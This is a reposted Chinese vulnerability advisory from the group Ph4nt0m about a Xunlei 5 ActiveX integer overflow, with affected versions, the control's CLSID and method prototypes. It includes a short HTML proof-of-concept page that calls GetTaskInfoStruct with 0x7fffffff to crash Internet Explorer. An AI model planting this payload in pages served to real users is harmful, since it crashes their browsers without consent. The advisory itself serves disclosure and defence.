两个迅雷的漏洞(0day) 's

admin 2017年4月25日08:44:09评论444 views字数 1295阅读4分19秒阅读模式
摘要

鬼仔:估计是06年最后一篇日志了,明天就该是2007年了。祝大家07年一切顺利,开开心心!

鬼仔:估计是06年最后一篇日志了,明天就该是2007年了。祝大家07年一切顺利,开开心心!

来源:幻影旅团

迅雷5 ThunderAgent Module 远程拒绝服务漏洞

by axis(axis_at_ph4nt0m.org)
http://www.ph4nt0m.org

摘要:
迅雷是由Thunder Networking公司开发的一个下载软件,在中国有着非常广泛的用户。迅雷5的ThunderAgent_005.dll中注册了一个

activex控件,当Internet Explorer调用他的某些方法时,将会造成整数溢出,成功利用将造成Internet Explorer崩溃。

影响版本:
迅雷5.5.2.252(已测试),
迅雷5.5.3.264(2006-12月最新版本已测试,受影响的dll变成ThunderAgent_007.dll)
其他版本可能也受影响

细节:
在ThunderAgent_005.dll中,有两处方法调用时忽略了输入参数异常的情况,当输入参数为精心构造的负数或大整数时,将造成整数溢出

,产生不可预料的结果,从而造成浏览器崩溃。

该Activex注册控件的Object Classid是 {485463B7-8FB2-4B3B-B29B-8B919B0EACCE}
Method原型如下:

[id(0x00000006), helpstring("method GetInfoStruct")]
void GetInfoStruct([in] int pInfo);

[id(0x00000007), helpstring("method GetTaskInfoStruct")]
void GetTaskInfoStruct([in] int pTaskInfo);


POC:
----------------------------------------------------------------------------------------
<html>
<head>

<script>
function AxisFun()
{

evil.GetTaskInfoStruct(0x7fffffff);

}
</script>
</head>

<OBJECT ID="evil" CLASSID="CLSID:{485463B7-8FB2-4B3B-B29B-8B919B0EACCE}"></OBJECT>

<script>javascript:AxisFun();</script>

</html>

----------------------------------------------------------------------------------------

建议:
禁止ie执行activex

厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.xunlei.com

关于Ph4nt0m:
Ph4nt0m是国内的一个安全组织,由一群来自五湖四海的朋友,因为共同热爱网络安全而走到一起来。
欢迎访问我们的网站http://www.ph4nt0m.org

–EOF–

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月25日08:44:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   两个迅雷的漏洞(0day) 'shttp://cn-sec.com/archives/49232.html

发表评论

匿名网友 填写信息